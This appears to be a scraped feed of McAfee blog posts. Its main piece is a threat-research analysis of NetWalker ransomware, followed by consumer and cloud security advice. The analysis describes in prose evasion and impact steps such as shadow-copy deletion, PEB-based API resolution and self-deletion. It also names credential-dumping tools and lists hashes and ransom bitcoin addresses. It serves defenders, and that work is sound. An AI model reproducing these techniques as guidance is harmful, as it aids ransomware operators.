Ransom-NetW!8E310318B1B5 GenericRXKD-DA!0537D845BA09 GenericRXKU-HO!DE61B852CADA GenericRXKD-DA!B4F8572D4500
PS/Netwalker.c GenericRXKD-DA!D09CFDA29F17 PS/Agent.bx GenericRXKD-DA!0FF5949ED496
GenericRXKD-DA!2B0384BE06D2 GenericRXKD-DA!5CE75526A25C GenericRXKD-DA!BDC345B7BCEC Ransom-CWall!993B73D6490B
GenericRXKD-DA!0E611C6FA27A GenericRXKU-HO!961942A472C2 Ransom-NetW!291E1CE9CD3E Ransom-Mailto!D60D91C24570
PS/Agent.bu GenericRXKU-HO!997F0EC7FCFA PS/Agent.bx Ransom-CWall!3D6203DF53FC
Ransom-Netwalker Ransom-NetW!BDE3EC20E9F8 Generic .kk
GenericRXKU-HO!1DB8C7DEA2F7 GenericRXKD-DA!DD4F9213BA67 GenericRXKD-DA!729928E6FD6A
GenericRXKU-HO!9FB87AC9C00E GenericRXKU-HO!187417F65AFB PS/Netwalker.b

 

McAfee Web Gateway Events
RDN/Ransom BehavesLike.Win32.RansomCWall.mh
BehavesLike.Win32.Generic.kh Ransom-NetW!1B6A2BFA39BC
BehavesLike.Win32.MultiPlug.kh Ransom:Win32/NetWalker.H!rsm
BehavesLike.Win32.Generic.qh BehavesLike.Win32.Trojan.kh
GenericRXKD-DA!DD4F9213BA67 BehavesLike.Win32.Ipamor.kh
BehavesLike.Win64.Trojan.nh BehavesLike.Win32.Generic.cz
RDN/Generic.dx BehavesLike.Win32.RansomCWall.mm
BehavesLike.Win64.BadFile.nh BehavesLike.Win32.Generic.dm

 

Summary

Ransomware has evolved into a lucrative business for threat actors, from underground forums selling ransomware, to offering services such as support portals to guide victims through acquiring crypto currency for payment, to the negotiation of the ransom. However, just as attackers work together, defenders must collaborate internally and externally to build an adaptive security architecture which will make it harder for threat actors to succeed and build resilience in the business. This blog highlights how to use McAfee’s security solutions to prevent, detect and respond to NetWalker and attackers using similar techniques.

McAfee ATR is actively monitoring ransomware threats and will continue to update McAfee MVISION Insights and its social networking channels with new and current information. Want to stay ahead of the adversaries? Check out McAfee MVISION Insights for more information.

The post McAfee Defender’s Blog: NetWalker appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-defenders-blog-netwalker/feed/ 0
Take a “NetWalk” on the Wild Side https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/#respond Mon, 03 Aug 2020 14:00:20 +0000 /blogs/?p=103773

Executive Summary The NetWalker ransomware, initially known as Mailto, was first detected in August 2019. Since then, new variants were discovered throughout 2019 and the beginning of 2020, with a strong uptick noticed in March of this year. NetWalker has noticeably evolved to a more stable and robust ransomware-as-a-service (RaaS) model, and our research suggests […]

The post Take a “NetWalk” on the Wild Side appeared first on McAfee Blogs.

]]>

Executive Summary

The NetWalker ransomware, initially known as Mailto, was first detected in August 2019. Since then, new variants were discovered throughout 2019 and the beginning of 2020, with a strong uptick noticed in March of this year.

NetWalker has noticeably evolved to a more stable and robust ransomware-as-a-service (RaaS) model, and our research suggests that the malware operators are targeting and attracting a broader range of technically advanced and enterprising criminal affiliates.

McAfee Advanced Threat Research (ATR) discovered a large sum of bitcoins linked to NetWalker which suggest its extortion efforts are effective and that many victims have had no option other than to succumb to its criminal demands.

We approached our investigation of NetWalker with some possible ideas about the threat actor behind it, only to later disprove our own hypothesis. We believe the inclusion of our thinking, and the means with which we debunked our own theory, highlight the importance of thorough research and we welcome further discussion on this topic. We believe it starts valuable discussions and helps avoid duplicate research efforts by others. We also encourage our peers in the industry to share information with us in case you have more evidence.

McAfee protects its customers against the malware covered in this blog in all its products, including personal antivirus, endpoint and gateway. To learn more about how McAfee products can defend against these types of attacks, visit our blog on Building Adaptable Security Architecture Against NetWalker.

Check out McAfee Insights to stay on top of NetWalker’s latest developments and intelligence on other cyber threats, all curated by the McAfee ATR team. Not only that, Insights will also help you prioritize threats, predict if your countermeasures will work and prescribe corrective actions.

Introduction

Since 2019, NetWalker ransomware has reached a vast number of different targets, mostly based in western European countries and the US. Since the end of 2019, the NetWalker gang has indicated a preference for larger organisations rather than individuals. During the COVID-19 pandemic, the adversaries behind NetWalker clearly stated that hospitals will not be targeted; whether they keep to their word remains to be seen.

The ransomware appends a random extension to infected files and uses Salsa20 encryption. It uses some tricks to avoid detection, such as a new defence evasion technique, known as reflective DLL loading, to inject a DLL from memory.

The NetWalker collective, much like those behind Maze, REvil and other ransomware, threatens to publish victims’ data if ransoms are not paid.

As mentioned earlier, NetWalker RaaS prioritizes quality over quantity and is looking for people who are Russian-speaking and have experience with large networks. People who already have a foothold in a potential victim’s network and can exfiltrate data with ease are especially sought after. This is not surprising, considering that publishing a victims’ data is part of NetWalker’s model.

The following sections are dedicated to introducing the NetWalker malware and displaying the telemetry status before moving on to the technical malware analysis of the ransomware’s behaviour. We will explain how the decryptor works and show some interactions between NetWalker’s operators and their victims. After this, we discuss the changes in modus operandi since September 2019, especially regarding payment behaviour. Then we show our attempts, unfruitful as they were, at discovering a link between NetWalker and previous, seemingly unrelated ransomware variants. Finally, we deliver an overview of IOCs related to NetWalker and its MITRE ATT&CK techniques.

Telemetry

Using McAfee’s billion Insights sensors, we can show the global prevalence of the NetWalker ransomware.

Figure 1. McAfee MVISION Insights shows global prevalence of the NetWalker ransomware

Technical Analysis

Ransom note (pre-March 2020)

Before March 2020, the NetWalker ransom note indicated how to contact the adversary directly using anonymous email account services with random names (such as kkeessnnkkaa@cock.li and hhaaxxhhaaxx@tuta.io):

Figure 2. Example of ransom note prior to March 2020

Ransom Note (Post-March 2020)

On 12 March 2020, a researcher shared a screenshot of a new NetWalker ransom note in a tweet and we can see that the attackers have changed the contact method significantly. Email communication has been dropped completely with victims now required to make contact through the NetWalker Tor interface where, after submitting their user key, they will then be redirected to a chat with NetWalker technical support. This change in contact method coincides with underground forum postings where NetWalker revealed it was opening its RaaS up for new affiliates. The Tor page was not the only noticeable change we will highlight in this blog.

Figure 3. Example of ransom note after March 2020

NetWalker Analysis

Figure 4. NetWalker behavior

NetWalker Resource Analysis (Pre-March 2020)

The NetWalker malware uses a custom resource type (1337 or 31337) containing its entire configuration. This file is extracted to memory and decrypted using the RC4 algorithm with a hard-coded key in the resource.

Before 12 March 2020, NetWalker used the email contact process between its support operation and the victims to proceed with payment and send the decryption program. To do this, NetWalker used its configuration file in the resource to set its encryption mode, the name of the ransom note, etc., and email contacts.

Name wwllww.exe
Size 96256 bytes
File-Type EXE
SHA 256 58e923ff158fb5aecd293b7a0e0d305296110b83c6e270786edcc4fea1c8404c
Compile time 6 December 2019

Figure 5. NetWalker resource from wwllww.exe

Once decrypted, the configuration file reveals several parameters, allowing us to understand how it works (how it constitutes the ransom note, the number of threads allocated for encryption, etc.):

mpk Public key
mode Encryption mode
thr Allocated threads for encryption process
spsz Encryption chunk
namesz Name length
idsz  ID length
crmask .mailto[email].{ID}
mail Contact mail
lfile Ransom Note name
lend B64 encoded ransom note
white Encryption whitelist
kill Processes, tasks, service names to terminate
unlocker Decryption exclusion list

NetWalker Resource Analysis (Post-March 2020)

When Netwalker changed its contact mode and switched from email to the submission of the user key directly on the web portal of the group’s blog, the configuration file in the resource also changed.  We found changes in the configuration file, such as the disappearance of the contact “mail” and “crmask” fields (previously set as XXX@cock.li,XXX@tuta.io, etc., and .mailto[email].{ID}). This field was replaced by “onion1” and “onion2”, and these fields are set with the NetWalker blog URL/payment page (hxxp://rnfdsgm<snip>drqqd.onion/). We also noticed that the NetWalker developers complemented their “unlocker” field with some specific values (e.g. “psexec.exe, system, forti*.exe, fmon.exe*, etc”).

Name cnt.ex
Size 70656 bytes
File-Type EXE
SHA 256 26dfa8512e892dc8397c4ccbbe10efbcf85029bc2ad7b6b6fe17d26f946a01bb
Compile time 2 May 2020

Figure 6. NetWalker resource from cnt.ex

Usually, attackers use RC_DATA or a malicious BITMAP. The latter can, for example, be a regular Bitmap (open matrix image format used by Windows) that can be used by malware to execute code or as a payload dropper. The image’s pixels are an actual binary representation of the payload. This process can be summarized as Exe -> Resources -> BMP with embedded data in pixels fetched and decrypted by, e.g. a DLL -> Payload), etc. However, in this case, they use this special custom type to increase obfuscation. The NetWalker developers chose custom types by using 1337 or 31337 structs, so the resource format does not change. However, as we said, several values have changed or been replaced:

mpk Public Key
mode Encryption mode
spsz Encryption chunk
thr Allocated threads for encryption process
namesz Name length
idsz ID length
lfile Ransom Note name
onion1 Blog URL 1
onion 2 Blog URL 2
white Encryption whitelist
kill Processes, tasks, service names to terminate
net Network resources encryption
unlocker Decryption exclusion list
lend B64 encoded ransom note

 

NetWalker Executable Analysis (Post-March 2020)

The malware sample used for this blog post has the same information:

Name c21ecd18f0bbb28112240013ad42dad5c01d20927791239ada5b

61e1c6f5f010

Size 70656 bytes
File-Type EXE
SHA 256 c21ecd18f0bbb28112240013ad42dad5c01d20927791239ada5b

61e1c6f5f010

Compile time 2 May 2020

The unpacked malware is a binary file of 32 bits that can be found as an EXE file.

Figure 7. Information sample of the malware

The malware’s first action is to combine all the required functions it needs into one large function, combining the modules already loaded in Windows with additional DLLs as described below.

Instead of searching for the function in the usual way, the malware makes a CRC32 hash of the name of each function and compares with hardcoded values. Additionally, instead of using the function “GetProcAddress”, the malware uses the Process Environment Block (PEB) to make analysis harder.

Figure 8. Get the module accessing the PEB and using a CRC32

If the module cannot be discovered, it will load with “LdrLoadDll”, a native function of Windows, to try avoiding hooks in the usual functions, e.g. “LoadLibraryW”:

Figure 9. Load library using LdrLoadDll

Figure 10. Get functions from module, e.g. using a CRC32 hash

If the malware fails to get a function, it will go to a “sleep” call and terminate itself.

Later, the malware extracts the configuration file from a resource with a custom type and a custom name using the functions “FindResourceA”, “LockResource”, “LoadResource” and “SizeOfResource”. The file extracted in memory is decrypted using the RC4 algorithm with a hardcoded key in the resource.

The struct of the resource is:

  • 4 bytes -> The size of the hardcoded key to decrypt the configuration file.
  • Variable size -> the hardcoded key to decrypt the configuration file.
  • Variable size -> the configuration file encrypted.

The malware reads the first 4 bytes and reserves memory with the size of the password and reserves memory of the resource minus 4 bytes and the size of the password. Finally, it decrypts the configuration file:

Figure 11. Get configuration file and decrypt it

If the malware fails to get the configuration file, it will terminate itself.

After getting the configuration file, the malware will parse it and save the fields in memory and write in the registry information to encrypt the files in the machine. The malware will try first to write in the registry-hive “HKEY_LOCAL_MACHINE” but if it cannot create it, it will use the registry-hive “HKEY_CURRENT_USER”:

Figure 12. Write in the registry

After the writing in the registry has been completed, it will get some privileges using a token as SE_DEBUG_PRIVILEGE and SE_IMPERSONATE_PRIVILEGE:

Figure 13. Get some special privileges in the token

Later, the malware creates three threads, one to get information about the machine, such as the operating system version, one to get processes and the last one to get services in the system.

After this step, it will get the system directory and use “VSSadmin” to delete the Volume Shadow copies of the system. Volume Shadow copies can contain copies of the encrypted files and would be an option to restore from if no backup exists.

Figure 14. Delete the shadow volumes

Later, the malware will enumerate the logical units, prepare the new extension for the future encrypted files, based on the size that is defined in the ransomware config with a random extension, and encrypt all files in the fixed type units and remote units with the new extension.

Figure 15. Crypt the files

After all these steps have been completed, it will create the ransom note on the desktop using the functions “SHGetFolderPathlW” and “CreateFileW”. Subsequently, it will write the ransom note from the memory into a new file with the function “WriteFile”. The malware will create the ransom note in the root folder (for example “c:\”) of each logical unit. Next, it will launch “notepad.exe” with an argument to the ransom note file to show the user what happened on the system:

Figure 16. Creation of the ransom note in the desktop and root units

Finally, after the encryption of the files and creation of the ransom note, the malware creates a bat file in the %temp% folder of the machine with a temporary name and writes the content to destroy itself using the program “taskkill”. The batch script will delete the malware sample with its path using the command “del” and finally delete the bat file with the command “del %0%”. Of course, as the malware uses the “del” command without destroying itself before the deletion, it can be recovered with some forensic tools with luck (the same can also be said for the bat file).

This way the malware tries to remove itself from the machine to avoid being detected and analyzed by security researchers:

Figure 17. Get Temp path and make a temporary file as a bat and launch it

Finally, the malware will finish with “ExitProcess”.

Decryptor

When a NetWalker victim goes through technical support (see an example of this below) and pays the ransom demanded by the group they will be able to download the decryptor to clean up their environment.

Figure 18. Conversation with NetWalker operators

The download is done directly from the NetWalker Tor site, where the payment page switches to a download page certifying that the payment was made and received:

Figure 19. Decryptor download

The decryptor is delivered in a zip archive containing the decryptor executable and a note explaining how to run the program correctly:

Figure 20. Decryptor delivery

The program launches a graphical interface allowing the user to decipher their workstation automatically or manually:

Figure 21. Decryptor execution

At the end of the decryption process, the program indicates the number of decrypted files, deletes the ransom note if the user has checked that option, and terminates, leaving the user to resume their work peacefully:

Figure 22. Decryptor has finished the decryption process

The decryptor program appears unique and is linked to one victim specifically. In our example, it only decrypts the files belonging to the victim who made the payment from the user key specified in the ransom note.

Underground Advertising

In March 2020, the moniker Bugatti began actively advertising the NetWalker Ransomware-as-a-Service on two popular underground fora. Bugatti seems to have joined the underground scene in February 2020 but claims to have been active with NetWalker ransomware since September 2019. We have seen NetWalker activity before March but there has been a noticeable uptick in larger victims since their advertisement. For a relatively new ransomware it has been well received and respected among other cybercriminals as compared to, for instance, Nemty ransomware. The strength of NetWalker’s reputation is such that our current hypothesis is that the individual behind Bugatti is most likely a well-respected and experienced cybercriminal, even though it is a new moniker.

Figure 23. Bugatti advertising NetWalker on an underground forum

Bugatti provides regular updates on the improvements in the ransomware, such as the popular Invoke-ReflectivePEInjection method, also commonly used by Sodinokibi. In addition to the improvements in the ransomware, open slots for new affiliates are advertised. Bugatti strongly emphasized that they are primarily looking for experienced affiliates that focus on compromising the complete networks of organizations as opposed to end users. NetWalker is clearly following in the footsteps of its illustrious targeted ransomware peers like Sodinokibi, Maze and Ryuk.

One forum message in particular caught our attention as it included screenshots of several partial bitcoin addresses and USD amounts. This was most likely done to showcase the financial success of the ransomware. We have seen a similar posting in the past with the influential Sodinokibi affiliate Lalartu, so we decided to follow the money once more.

Figure 24. Bugatti is looking for advanced affiliates and shows samples of BTC payments

With the help of CipherTrace software we were able to find the complete BTC addresses from the screenshot and investigate the ledger further:

Screenshot 1

3JHTYZhRmMcq7WCKRzFN98vWvAZk792w9J

Screenshot 2

39aovzbz5rGoQdKjDm6JiybkSu1uGdVJ2V

Screenshot 3

39NRnZtgACDVhhmc7RwmvH9ZDUKTNwwaeB

Screenshot 4

3L4AW5kHnUCZBBjg2j1LBFCUN1RsHPLxCs

Following the Money

In the transactions mentioned in the underground forum post, the ransom amount payed by the victims is presumably shown. Since the bitcoin blockchain is a publicly accessible ledger, we can follow the money and see where the ransomware actors are transferring it to. In the case of the four posted transactions above, the full amount payed by the victim was transferred to two addresses (these addresses begin with bc1q98 and 1DgLhG respectively). It is safe to say that these two bitcoin addresses are under control of the NetWalker actors. We then proceeded on to analyze all incoming transactions to these two addresses and we were able to make the following observations:

  • The first incoming transaction occurs on 1 March 2020.
  • On 30 March 2020 the first incoming transaction appears where the amount is split between 4 different bitcoin addresses. A split like this is typically seen in Ransomware-as-a-Service, where the ransom payment is split between the RaaS operators and the affiliate who caused the infection. In this first transaction, the split is 80%, 10% and two 5% portions. This split matches the advertisement on the underground forum (80% – 20%).
  • The two 5% portions of the ransom payments that are split, seem to be consistently transferred to the two bitcoin addresses we revealed earlier (bc1q98 and 1DgLhG).
  • While the beneficiaries of the 5% cuts remain the same, the beneficiary of the 10% cut seems to change over time. Based on the forum post we assume these addresses also belong to the NetWalker actors.
  • Payments to the bc1q98 and 1DgLhG addresses that are not being split continue up until the end of May. Possibly the initial NetWalker operators added a RaaS operation, while continuing to cause NetWalker infections themselves.
  • While analyzing the bitcoin addresses that received 80% or more of the transaction amount, we noticed that there are some addresses that receive payments multiple times. A possible explanation could be that the address is configured as payout addresses for a certain campaign or affiliate. We identified 30 unique bitcoin addresses that seem to be the beneficiary of this larger portion of the ransom transaction. Some of these only received one payment but there are several that received multiple payments.
  • In the two addresses uncovered by tracing the transactions a total of 641 bitcoin is held on 27 July 2020. Which at the current market value of bitcoin is worth well over 7 million USD.

Amounts Extorted

Working under the hypothesis that all the incoming transactions are ransomware payments; we can make the following observations:

  • We found 23 transactions where the ransom payments were not split up and the beneficiaries are the two bitcoin addresses found by following the transactions mentioned in the underground forum post. The total amount of bitcoin extorted this way between 1 March 2020 and 27 July 2020 is 677 BTC. Additionally, the amount received from remaining transactions following the Ransomware-as-a-Service scheme by these addresses between 1 March 2020 and 27 July 2020 is 188 BTC.
  • In the transactions that are split, the largest amount (usually 80% to 90% of the total transaction value) is presumably transferred to the affiliate that caused the infection. When we summed up these largest portions, we saw a total of 1723 BTC being transferred to affiliates.
  • The total amount of extorted bitcoin that has been uncovered by tracing transactions to these NetWalker related addresses is 2795 BTC between 1 March 2020 and 27 July 2020. By using historic bitcoin to USD exchange rates, we estimate a total of 25 million USD was extorted with these NetWalker related transactions.

Even though we do not have complete visibility into the BTC flow before NetWalker started ramping up, one thing is certain, this quarter alone it has been highly successful at extorting organisations for large amounts of money. All this at a time when many sectors are struggling because people are sheltering in place and governments are trying to keep businesses from going bankrupt. NetWalker is making millions off the backs of legitimate companies.

Figure 25. Overview of uncovered bitcoin transactions, highlighting the two identified actor addresses.

Observed Changes

While talking about the impact of NetWalker with our partners, we learned that the change in modus operandi not only affected the way the actors communicate with their victims. When there was a change from email communication to a dedicated Tor hidden service, the actors also moved away from using legacy bitcoin addresses to SegWit addresses. The benefits of using the newer SegWit addresses include faster transaction time and lower transaction cost. The NetWalker advertisement on the underground forum mentions instant and fully automatic payments around the time of this observed change. This makes us believe the ransomware actors were professionalizing their operation just before expanding to the Ransomware-as-a-Service model.

Comparison with Previous Ransomware

Given the sudden appearance of NetWalker ransomware and the associated threat actor, it suggests that some prior knowledge on ransomware development or underground presence had to be in place. Armed with this hypothesis, we searched for possible links to underground actors and other ransomware strains that might fit the bill. We came across one threat actor offering ransomware that caught our attention. It was the use of the name NetWalker, in combination with a strong ransomware connection, that sparked our interest.

Some years ago, a threat actor using the moniker Eriknetwalker was advertising ransomware on several underground forums. We found posts from 2016 and the latest public activity was around June 2019, several months before NetWalker ransomware made its appearance.

Figure 26. Eriknetwalker began advertising their ransomware in 2016 (Google-translated from Russian)

Based on our underground research, we linked the moniker Eriknetwalker to the development and/or distribution of Amnesia, Bomber and Scarab ransomware. Eriknetwalker stopped advertising ransomware around June 2019. Therefore, we decided to perform a comparative analysis between the different ransomware strains linked to Eriknetwalker and some of the earliest versions of NetWalker we could find.

The goal of this comparative analysis was to identify whether there was an overlap between source codes. Such overlap could suggest a stronger link between the current NetWalker version and the other ransomware versions from Eriknetwalker, possibly even explaining the name overlap.

To execute the analysis, we used several tools one of which was the binary visualization tool Veles, which dynamically translates binary information into an abstract visualization that allows us to identify and compare patterns.

The different types of ransomware we began analyzing were the variants of Amnesia, Scarab, and NetWalker.

Figure 27. Flat visualization of binary data of the different ransomware variants

Figure 28. 3D visualization of binary data of the different ransomware variants

Visualizing data in such a manner is a way to use the human brain to quickly identify patterns and be able to draw comparisons between objects. In our case, we see that, based on the binary data visualized in Figures 27 and 28, the ransomware binaries do yield differences that we cannot ignore.

Figure 29. Comparison of source code results

Figure 29 shows the results of a source code similarity analysis led on the different variants of ransomware named in the figure itself. Interesting enough, Scarab and Amnesia show a higher overlap with Buran and Zeppelin than the early NetWalker samples. The percentages shown are the amount of code that is similar between two variants.

As illustrated in the overview, the September 2019 NetWalker version has a different codebase from the ErikNetWalker-linked ransomware variants. This finding disproves our earlier hypothesis that NetWalker is linked to the older Amnesia variants based on code overlap.

Often, research teams do not publish their results when it disproves their own hypothesis. However, for the sake of transparency, we decided to include our research efforts.

YARA Rules

We uploaded a YARA rule to detect almost all the samples observed in the wild to date.

Indicators of Compromise

During our investigation we have observed numerous IoCs linked to NetWalker ransomware. To obtain them please visit our McAfee ATR GitHub site, or get the latest NetWalker IoCs and intelligence on many other threats with McAfee Insights.

MITRE ATT&CK Techniques

The below techniques were based on our research and complemented with research from industry peers.

  • Initial Access
    • Exploit Public-Facing Application (T1190) : Exploit Tomcat, Exploit WebLogic
    • Spear phishing Attachment (T1566.001): Phishing email
    • Valid Accounts (T1078): RDP compromised
  • Execution
    • PowerShell (T1059.001): PowerShell Script
    • Command and Scripting Interpreter: Windows Command Shell (003)
    • Service Execution (T1569.002): PsExec
    • Native API (T1106): Use Windows API functions to inject DLL
    • Windows Management Instrumentation (T1047)
  • Persistence
    • Registry Run Key (T1547.001): Place a value on RunOnce key
    • Modify Registry key (T1112): Create its own registry key in \SOFTWARE\<uniquename>
  • Privilege Escalation
    • Exploitation for Privilege Escalation (T1068): CVE-2020-0796, CVE-2019-1458, CVE-2017-0213, CVE-2015-1701
    • Process Injection (T1055.001): Reflective DLL Injection
  • Defense Evasion
    • Disabling Security Tools (T1562.001): ESET AV Remover, Trend Micro’s Security Agent Uninstall Tool, Microsoft Security Client Uninstall
    • Process Injection (T1055.001): Reflective DLL Injection
    • Deobfuscate/Decode Files or Information (T1140)
    • Obfuscated Files or Information (T1027): PowerShell Script uses Base64 and hexadecimal encoding and XOR-encryption
  • Credential Access
    • Credential Dumping (T1003): Mimikatz, Mimidogz, Mimikittenz, Windows Credentials Editor, Pwdump, LaZagne
    • Brute Force (T1110.001): NLBrute
  • Discovery
    • Network Service Scanning (T1046): SoftPerfect Network Scanner
    • Security Software Discovery (T1518.001)
    • System Information Discovery (T1082)
  • Lateral Movement
    • Third-Party Software (T1072): TeamViewer, Anydesk
    • Service Execution (T 1569.002): PsExec
    • Lateral Tool Transfer (T1570)
  • Collection
    • Data from information repositories (T1213)
    • Data from local system (T1005)
    • Data from network shared drive (T1039)
  • Command and Control
    • Ingress Tool Transfer (T1105)
  • Impact
    • Data Encrypted (T1486): NetWalker Ransomware
    • Inhibit System Recovery (T1490): Shadow Copies Deleted
    • Service Stop (T1489)

Conclusion

Ransomware has evolved into a lucrative business for threat actors, from underground forums selling ransomware, to offering services such as support portals to guide victims through acquiring crypto currency for payment, to the negotiation of the ransom. McAfee’s Advanced Threat Research team has analysed the NetWalker ransomware and have been following its evolution from the initial sighting of the Mailto ransomware to its redevelopment into the NetWalker ransomware. The recent shift to a business-centric model of Ransomware-as-a-Service is a clear sign that it is stepping up, so it seems that the NetWalker group is following in the footsteps of REvil and other successful RaaS groups. The ransomware developers have proven the ability to refocus and capitalize on current world events and develop lures to help ensure the effectiveness of the ransomware, which has allowed them to become selective of their affiliates by limiting access to the ransomware to only those with vetted access to large organizations. As development of the ransomware continues, we have witnessed recent shifts in activity that closely follow in the footsteps of other ransomware developments, including threatening victims with the release of confidential information if the ransom is not met.

McAfee ATR is actively monitoring ransomware threats and will continue to update McAfee MVISION Insights and its social networking channels with new and current information. MVISION Insights is the only proactive endpoint security solution that simultaneously prioritizes and predicts threats that matter to our customers while offering prescriptive guidance on what to do in their local environment. Want to stay ahead of the adversaries? Check out McAfee MVISION Insights for more information. If you want to experience some of the MVISION Insights capabilities, go the Preview of MVISION Insights where you can select the top threat information that is available.

Authored by: Thibault Seret, Valentine Mairet, Jeffrey Sman, Alfred Alvarado, Tim Hux, Alexandre Mundo, John Fokker, Marc Rivero Lopez and Thomas Roccia.

The post Take a “NetWalk” on the Wild Side appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/feed/ 0
How to Keep Remote Learning Pod Students Safe Online  https://www.mcafee.com/blogs/consumer/family-safety/how-to-keep-remote-learning-pod-students-safe-online/ https://www.mcafee.com/blogs/consumer/family-safety/how-to-keep-remote-learning-pod-students-safe-online/#respond Sat, 01 Aug 2020 16:39:41 +0000 /blogs/?p=104169 learning pods

The upheaval of 2020 has forced us all to reimagine familiar pathways, and parents are no exception. Cautious about sending their kids back into the classroom, families across the country are banding together to form remote “learning pods.” Learning pods are small groups of families with like-aged children that agree to educate their kids together. […]

The post How to Keep Remote Learning Pod Students Safe Online  appeared first on McAfee Blogs.

]]>
learning pods

The upheaval of 2020 has forced us all to reimagine familiar pathways, and parents are no exception. Cautious about sending their kids back into the classroom, families across the country are banding together to form remote “learning pods.”

pod learning

Learning pods are small groups of families with like-aged children that agree to educate their kids together. Parents also refer to learning pods as micro-schools, pandemic pods, and bubbles. According to parents, a pod environment will allow students to learn in a structured setting and safely connect with peers, which will also be a boost to their mental health following months of isolation.

According to media reports, each pod’s structure is different and designed to echo the unique distance learning challenges of each family. In some pods, parents will determine the curriculum. In others, a teacher or tutor will. As well, parents have set some pods up so they can take turns teaching and working. Some will have a cost attached to cover teacher fees and materials. Working parents are also creating “nanny share” pods for pre-school aged children.

Social Networking

Facebook is the place to connect for families seeking pod learning options. There are now dozens of private Facebook “pod” groups that enable parents to connect with one another and with teachers who have also opted out of returning to the classroom.

While parents may structure pods differently, each will need to adopt standard digital security practices to protect students and teachers who may share online resources. If pod learning is in your family’s future, here are a few safeguards to discuss before the pod-based school year begins.

Digital Safety & Learning Pods

Be on the lookout for malware. Malware attempts, since COVID, continue to rise. Pod learners may use email, web-based collaboration tools, and outside home networks more, which can expose them to malware risks. Advise kids never to click unsolicited links contained in emails, texts, direct messages, or pop-up screens. Even if they know the sender, coach them to scrutinize the email or text. To help protect your child’s devices against malware, phishing attacks, and other threats while pod learning, consider updating your security solutions across all devices.

Use strong passwords. Back-to-school is a great time to review what makes a strong password. Opt for two-factor authentication to add another layer of protection between you and a potential attacker.

learning pods

Consider a VPN. Your home network may be safe, but you can’t assume other families follow the same protocols. Cover your bases with a VPN. A virtual private network (VPN) is a private network your child can log onto safely from any location.

Filter and track digital activity. One digital safeguard schools usually have that a home environment may not, are firewalls. Schools erect firewalls to keep kids from accessing social networks and gaming sites during school hours. For this reason, families opting for pod learning might consider parental controls. Parental controls allow families to filter or block web content, log daily web activity, set time limits, and track location.

Learning pods are still taking shape at the grassroots level, and there are still a lot of unknowns. Still, one thing is clear: Remote education options also carry an inherent responsibility to keep students safe and secure while learning online.

The post How to Keep Remote Learning Pod Students Safe Online  appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/how-to-keep-remote-learning-pod-students-safe-online/feed/ 0
Source Code Leak – What We Learned and How You Can Protect Your IP https://www.mcafee.com/blogs/enterprise/cloud-security/source-code-leak-what-we-learned-and-how-you-can-protect-your-ip/ https://www.mcafee.com/blogs/enterprise/cloud-security/source-code-leak-what-we-learned-and-how-you-can-protect-your-ip/#respond Fri, 31 Jul 2020 16:05:48 +0000 /blogs/?p=104367

This week we learned about a leak of source code from 50 prominent companies, posted by a Swiss IT consultant. These come after another recent leak of source code from Nintendo, prompting us to comment on the issue of IP protection and secure development pipelines.   The latest leak appears to stem primarily from a misconfiguration of […]

The post Source Code Leak – What We Learned and How You Can Protect Your IP appeared first on McAfee Blogs.

]]>

This week we learned about a leak of source code from 50 prominent companies, posted by a Swiss IT consultant. These come after another recent leak of source code from Nintendo, prompting us to comment on the issue of IP protection and secure development pipelines.  

The latest leak appears to stem primarily from a misconfiguration of SonarQube, an open-source tool for static code analysis, which allows developers to audit their code for bugs and vulnerabilities prior to deployment.  

Our own assessment found that SonarQube communicates on port 9000, which was likely misconfigured to be open to the internet for the breached companies, allowing researchers to gain access and discover the data now exposed in the leak.   

A search for SonarQube on the popular IoT search engine Shodan allows anyone to discover ports used by common software such as this. With this information so easily available, ports unintentionally left open can introduce a wide swath of intrusion attempts.  

Several of the source code repositories also contained hard-coded credentials, which open the door to accessing other resources and expansion of the breach. It is a best practice to never commit code with hard-coded/plaintext credentials to your repositories.   

How You Can Protect Your IP  

Mistakes like misconfiguration and accidental credential exposure will happen in the development process, which is where InfoSec teams need to step in. Auditing infrastructure code both prior to deployment and continuously in production is essential for companies practicing DevOps and CI/CD.  

Our solution to this problem is MVISION Cloud, the multi-cloud security platform for enterprises to protect their data, prevent threats, and maintain secure deployments for their cloud-native apps.  

Audit Cloud Accounts for Misconfiguration 

With MVISION Cloud InfoSec teams can monitor their company’s public cloud accounts, like AWS, Azure, or GCP, for configuration mistakes that may expose sensitive data. In the example below, MVISION Cloud discovered that a resource in AWS EC2 was configured with Unrestricted Access to ports other than 80/443, opening up potential breach scenarios like we saw with the source code leak.  

Scan Application Code for Vulnerabilities  

Companies with active container deployments should take this one step further, auditing not only for misconfigurations but also CVEs in their container images. In the example below, MVISION Cloud discovered that one container image contained 219 code vulnerabilities, many of which could be exploited in an attack.  

Scan Repositories for Hard-Coded Credentials and Secret Keys 

To mitigate the risk of credential or secret key exposure, within MVISION Cloud you can easily scan your repositories for specific data types and take multiple levels of action. Below we’ve set up a policy to scan Bitbucket and Github with our Data Loss Prevention (DLP) data identifiers for AWS Keys and Passwords. With Passwords, we are using keyword validation, meaning we will only trigger an incident if a keyword like pwd, p, or password is nearby. We’ve chosen the least disruptive action here – notifying the end user to remediate themselves, however the option to delete the data is also available.   

The speed of DevOps is allowing companies to innovate quickly, but without security audits built into the pipeline, misconfigurations and vulnerable code can go unnoticed and expose data in a breach. We strongly encourage the movement from DevOps to DevSecOps, building this audit process into the standard practice of application development. 

For more on how MVISION Cloud can enable you to implement a DevSecOps practice, get in touch with us today.  

The post Source Code Leak – What We Learned and How You Can Protect Your IP appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/cloud-security/source-code-leak-what-we-learned-and-how-you-can-protect-your-ip/feed/ 0
Smartphone Alternatives for Free-Ranging Kids https://www.mcafee.com/blogs/consumer/smartphone-alternatives-for-free-ranging-kids/ Thu, 30 Jul 2020 22:34:36 +0000 /blogs/?p=104316 Child using smartphone

Smartphone Alternatives for Free-Ranging Kids A popular topic in our blogs is “when to buy a child a smartphone,” and for good reason. It’s an important conversation, one that calls for plenty of research and reflection as you look to balance the risks and rewards of giving your child a smartphone. Maybe you’ve already arrived […]

